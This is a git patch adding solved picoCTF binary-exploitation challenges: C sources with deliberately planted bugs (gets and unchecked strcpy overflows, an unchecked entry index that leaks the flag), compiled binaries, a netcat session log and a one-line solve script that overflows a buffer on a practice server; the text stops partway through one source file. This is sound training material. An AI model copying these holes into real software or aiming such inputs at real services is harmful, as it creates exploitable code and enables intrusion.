From 532e0931224d10771334e1c0d6e04dc50654c9b6 Mon Sep 17 00:00:00 2001
From: h7x4 <h7x4@nani.wtf>
Date: Sun, 1 Sep 2024 22:01:27 +0200
Subject: [PATCH] pwn: add already solved challenges

---
 pwn/basic_file_exploit/netcat.log         |  21 +++
 pwn/basic_file_exploit/program-redacted.c | 195 ++++++++++++++++++++++
 pwn/buffer_overflow_0/flag.txt            |   1 +
 pwn/buffer_overflow_0/solve.sh            |   3 +
 pwn/buffer_overflow_0/vuln                | Bin 0 -> 16016 bytes
 pwn/buffer_overflow_0/vuln.c              |  44 +++++
 pwn/clutter_overflow/chall                | Bin 0 -> 12704 bytes
 pwn/clutter_overflow/chall.c              |  54 ++++++
 pwn/clutter_overflow/flag.txt             |   1 +
 pwn/clutter_overflow/solve.py             |  31 ++++
 pwn/cve_xxxx_xxxx/flag.txt                |   1 +
 pwn/stonks/solve.py                       |  43 +++++
 pwn/stonks/vuln.c                         | 148 ++++++++++++++++
 13 files changed, 542 insertions(+)
 create mode 100644 pwn/basic_file_exploit/netcat.log
 create mode 100644 pwn/basic_file_exploit/program-redacted.c
 create mode 100644 pwn/buffer_overflow_0/flag.txt
 create mode 100755 pwn/buffer_overflow_0/solve.sh
 create mode 100755 pwn/buffer_overflow_0/vuln
 create mode 100644 pwn/buffer_overflow_0/vuln.c
 create mode 100755 pwn/clutter_overflow/chall
 create mode 100644 pwn/clutter_overflow/chall.c
 create mode 100644 pwn/clutter_overflow/flag.txt
 create mode 100755 pwn/clutter_overflow/solve.py
 create mode 100644 pwn/cve_xxxx_xxxx/flag.txt
 create mode 100755 pwn/stonks/solve.py
 create mode 100644 pwn/stonks/vuln.c

diff --git a/pwn/basic_file_exploit/netcat.log b/pwn/basic_file_exploit/netcat.log
new file mode 100644
index 0000000..9fd7e40
--- /dev/null
+++ b/pwn/basic_file_exploit/netcat.log
@@ -0,0 +1,21 @@
+$ nc saturn.picoctf.net 51109
+Hi, welcome to my echo chamber!
+Type '1' to enter a phrase into our database
+Type '2' to echo a phrase in our database
+Type '3' to exit the program
+1
+1
+Please enter your data:
+asdf
+asdf
+Please enter the length of your data:
+4
+4
+Your entry number is: 1
+Write successful, would you like to do anything else?
+2
+2
+Please enter the entry number of your data:
+0
+0
+picoCTF{M4K3_5UR3_70_CH3CK_Y0UR_1NPU75_E0394EC0}
diff --git a/pwn/basic_file_exploit/program-redacted.c b/pwn/basic_file_exploit/program-redacted.c
new file mode 100644
index 0000000..ad40974
--- /dev/null
+++ b/pwn/basic_file_exploit/program-redacted.c
@@ -0,0 +1,195 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <string.h>
+#include <stdint.h>
+#include <ctype.h>
+#include <unistd.h>
+#include <sys/time.h>
+#include <sys/types.h>
+
+
+#define WAIT 60
+
+
+static const char* flag = "[REDACTED]";
+
+static char data[10][100];
+static int input_lengths[10];
+static int inputs = 0;
+
+
+
+int tgetinput(char *input, unsigned int l)
+{
+    fd_set          input_set;
+    struct timeval  timeout;
+    int             ready_for_reading = 0;
+    int             read_bytes = 0;
+
+    if( l <= 0 )
+    {
+      printf("'l' for tgetinput must be greater than 0\n");
+      return -2;
+    }
+
+
+    /* Empty the FD Set */
+    FD_ZERO(&input_set );
+    /* Listen to the input descriptor */
+    FD_SET(STDIN_FILENO, &input_set);
+
+    /* Waiting for some seconds */
+    timeout.tv_sec = WAIT;    // WAIT seconds
+    timeout.tv_usec = 0;    // 0 milliseconds
+
+    /* Listening for input stream for any activity */
+    ready_for_reading = select(1, &input_set, NULL, NULL, &timeout);
+    /* Here, first parameter is number of FDs in the set,
+     * second is our FD set for reading,
+     * third is the FD set in which any write activity needs to updated,
+     * which is not required in this case.
+     * Fourth is timeout
+     */
+
+    if (ready_for_reading == -1) {
+        /* Some error has occured in input */
+        printf("Unable to read your input\n");
+        return -1;
+    }
+
+    if (ready_for_reading) {
+        read_bytes = read(0, input, l-1);
+        if(input[read_bytes-1]=='\n'){
+        --read_bytes;
+        input[read_bytes]='\0';
+        }
+        if(read_bytes==0){
+            printf("No data given.\n");
+            return -4;
+        } else {
+            return 0;
+        }
+    } else {
+        printf("Timed out waiting for user input. Press Ctrl-C to disconnect\n");
+        return -3;
+    }
+
+    return 0;
+}
+
+
+static void data_write() {
+  char input[100];
+  char len[4];
+  long length;
+  int r;
+
+  printf("Please enter your data:\n");
+  r = tgetinput(input, 100);
+  // Timeout on user input
+  if(r == -3)
+  {
+    printf("Goodbye!\n");
+    exit(0);
+  }
+
+  while (true) {
+    printf("Please enter the length of your data:\n");
+    r = tgetinput(len, 4);
+    // Timeout on user input
+    if(r == -3)
+    {
+      printf("Goodbye!\n");
+      exit(0);
+    }
+
+    if ((length = strtol(len, NULL, 10)) == 0) {
+      puts("Please put in a valid length");
+    } else {
+      break;
+    }
+  }
+
+  if (inputs > 10) {
+    inputs = 0;
+  }
+
+  strcpy(data[inputs], input);
+  input_lengths[inputs] = length;
+
+  printf("Your entry number is: %d\n", inputs + 1);
+  inputs++;
+}
+
+
+static void data_read() {
+  char entry[4];
+  long entry_number;
+  char output[100];
+  int r;
+
+  memset(output, '\0', 100);
+
+  printf("Please enter the entry number of your data:\n");
+  r = tgetinput(entry, 4);
+  // Timeout on user input
+  if(r == -3)
+  {
+    printf("Goodbye!\n");
+    exit(0);
+  }
+
+  if ((entry_number = strtol(entry, NULL, 10)) == 0) {
+    puts(flag);
+    fseek(stdin, 0, SEEK_END);
+    exit(0);
+  }
+
+  entry_number--;
+  strncpy(output, data[entry_number], input_lengths[entry_number]);
+  puts(output);
+}
+
+
+int main(int argc, char** argv) {
+  char input[3] = {'\0'};
+  long command;
+  int r;
+
+  puts("Hi, welcome to my echo chamber!");
+  puts("Type '1' to enter a phrase into our database");
+  puts("Type '2' to echo a phrase in our database");
+  puts("Type '3' to exit the program");
+
+  while (true) {
+    r = tgetinput(input, 3);
+    // Timeout on user input
+    if(r == -3)
+    {
+      printf("Goodbye!\n");
+      exit(0);
+    }
+
+    if ((command = strtol(input, NULL, 10)) == 0) {
+      puts("Please put in a valid number");
+    } else if (command == 1) {
+      data_write();
+      puts("Write successful, would you like to do anything else?");
+    } else if (command == 2) {
+      if (inputs == 0) {
+        puts("No data yet");
+        continue;
+      }
+      data_read();
+      puts("Read successful, would you like to do anything else?");
+    } else if (command == 3) {
+      return 0;
+    } else {
+      puts("Please type either 1, 2 or 3");
+      puts("Maybe breaking boundaries elsewhere will be helpful");
+    }
+  }
+
+  return 0;
+}
diff --git a/pwn/buffer_overflow_0/flag.txt b/pwn/buffer_overflow_0/flag.txt
new file mode 100644
index 0000000..4944a4b
--- /dev/null
+++ b/pwn/buffer_overflow_0/flag.txt
@@ -0,0 +1 @@
+flag{FAKEFLAG}
diff --git a/pwn/buffer_overflow_0/solve.sh b/pwn/buffer_overflow_0/solve.sh
new file mode 100755
index 0000000..defe7bf
--- /dev/null
+++ b/pwn/buffer_overflow_0/solve.sh
@@ -0,0 +1,3 @@
+#!/usr/bin/env bash
+
+echo "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" | nc saturn.picoctf.net 65443
diff --git a/pwn/buffer_overflow_0/vuln b/pwn/buffer_overflow_0/vuln
new file mode 100755
index 0000000000000000000000000000000000000000..e4e63e14afea88a0d1c6f3c8215cddff4b735005
GIT binary patch
literal 16016
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

literal 0
HcmV?d00001

diff --git a/pwn/buffer_overflow_0/vuln.c b/pwn/buffer_overflow_0/vuln.c
new file mode 100644
index 0000000..ddeb1b5
--- /dev/null
+++ b/pwn/buffer_overflow_0/vuln.c
@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <signal.h>
+
+#define FLAGSIZE_MAX 64
+
+char flag[FLAGSIZE_MAX];
+
+void sigsegv_handler(int sig) {
+  printf("%s\n", flag);
+  fflush(stdout);
+  exit(1);
+}
+
+void vuln(char *input){
+  char buf2[16];
+  strcpy(buf2, input);
+}
+
+int main(int argc, char **argv){
+
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(flag,FLAGSIZE_MAX,f);
+  signal(SIGSEGV, sigsegv_handler); // Set up signal handler
+
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+
+  printf("Input: ");
+  fflush(stdout);
+  char buf1[100];
+  gets(buf1);
+  vuln(buf1);
+  printf("The program will exit now\n");
+  return 0;
+}
diff --git a/pwn/clutter_overflow/chall b/pwn/clutter_overflow/chall
new file mode 100755
index 0000000000000000000000000000000000000000..c37dc1d37638a598eb6334e83065bb89f18c9005
GIT binary patch
literal 12704
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
gpxC8_x^I^JVUKfamvmP_p`880D)4~Ez$3E%0Ap%4B>(^b

literal 0
HcmV?d00001

diff --git a/pwn/clutter_overflow/chall.c b/pwn/clutter_overflow/chall.c
new file mode 100644
index 0000000..a5c070f
--- /dev/null
+++ b/pwn/clutter_overflow/chall.c
@@ -0,0 +1,54 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+#define SIZE 0x100
+#define GOAL 0xdeadbeef
+
+const char* HEADER =
+" ______________________________________________________________________\n"
+"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^|\n"
+"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |\n"
+"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ==================^ ^ ^|\n"
+"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ___ ^ ^ ^ ^ /                  \\^ ^ |\n"
+"|^ ^_^ ^ ^ ^ =========^ ^ ^ ^ _ ^ /   \\ ^ _ ^ / |                | \\^ ^|\n"
+"| ^/_\\^ ^ ^ /_________\\^ ^ ^ /_\\ | //  | /_\\ ^| |   ____  ____   | | ^ |\n"
+"|^ =|= ^ =================^ ^=|=^|     |^=|=^ | |  {____}{____}  | |^ ^|\n"
+"| ^ ^ ^ ^ |  =========  |^ ^ ^ ^ ^\\___/^ ^ ^ ^| |__%%%%%%%%%%%%__| | ^ |\n"
+"|^ ^ ^ ^ ^| /     (   \\ | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |/  %%%%%%%%%%%%%%  \\|^ ^|\n"
+".-----. ^ ||     )     ||^ ^.-------.-------.^|  %%%%%%%%%%%%%%%%  | ^ |\n"
+"|     |^ ^|| o  ) (  o || ^ |       |       | | /||||||||||||||||\\ |^ ^|\n"
+"| ___ | ^ || |  ( )) | ||^ ^| ______|_______|^| |||||||||||||||lc| | ^ |\n"
+"|'.____'_^||/!\\@@@@@/!\\|| _'______________.'|==                    =====\n"
+"|\\|______|===============|________________|/|\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
+"\" ||\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"  \n"
+"\"\"''\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
